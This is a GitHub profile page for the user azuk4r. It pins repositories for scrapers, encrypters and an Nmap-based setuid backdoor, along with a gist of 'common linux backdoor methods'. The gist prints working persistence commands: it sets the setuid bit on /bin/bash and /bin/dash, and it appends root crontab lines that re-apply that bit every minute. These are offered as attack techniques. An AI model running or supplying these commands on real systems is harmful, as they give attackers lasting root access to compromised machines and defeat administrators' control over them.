Skip to content
View azuk4r's full-sized avatar
🍪
loading cookies
🍪
loading cookies

Block or report azuk4r

Block user

Prevent this user from interacting with your repositories and sending you notifications. Learn more about blocking users.

You must be logged in to block users.

Maximum 250 characters. Please don't include any personal information such as legal names or email addresses. Markdown supported. This note will be visible to only you.
Report abuse

Contact GitHub support about this user’s behavior. Learn more about reporting abuse.

Report abuse

Pinned Loading

  1. scrapers scrapers Public

    scrapers collection I made

    Python 6

  2. encrypters encrypters Public

    encrypters collection I made

    Python 6

  3. nmap_backdoor nmap_backdoor Public

    Backdoor that leverages Nmap with setuid permissions to execute commands as root through a Lua-loaded C library

    C 50 7

  4. common linux backdoor methods common linux backdoor methods
    1
    # backdoors
    2
    chmod u+s /bin/bash
    3
    chmod u+s /bin/dash
    4
    echo '* * * * * root chmod u+s /bin/bash' >> /etc/crontab
    5
    echo '* * * * * root chmod u+s /bin/dash' >> /etc/crontab